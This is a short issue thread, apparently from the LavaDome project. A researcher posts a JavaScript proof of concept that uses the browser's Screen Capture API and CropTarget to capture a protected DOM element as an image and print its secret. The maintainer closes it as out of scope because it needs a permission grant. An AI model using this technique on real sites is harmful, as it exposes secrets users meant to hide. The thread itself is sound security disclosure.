LavaDome bypass via Screen Capture API

[masatokinugawa]

Although it requires user interaction, this might be one to keep in mind as a possible attack.

• Visit the demo using Chrome
• Open console, run the code below and click "Allow". An image containing secret will be generated

  const video = document.createElement('video');
  document.body.appendChild(video);
  const cropTarget = await CropTarget.fromElement(PRIVATE);
  const stream = await navigator.mediaDevices.getDisplayMedia({
  preferCurrentTab: true
  });
  const [videoTrack] = stream.getVideoTracks();
  await videoTrack.cropTo(cropTarget);
  video.srcObject = stream;
  await video.play();
  const canvas = document.createElement('canvas');
  canvas.width = video.clientWidth;
  canvas.height = video.clientHeight;
  const context = canvas.getContext('2d');
  context.drawImage(video, 0, 0, canvas.width, canvas.height);
  console.log(canvas.toDataURL('image/png')); // image containing secret will be generated

[weizman]

This is an interesting one, I'm glad it is documented. However, requiring special permissions is considered out of scope here, as LavaDome is by definition vulnerable to higher privileged entities (e.g. extensions, web-drivers, special permissions, etc). Closing.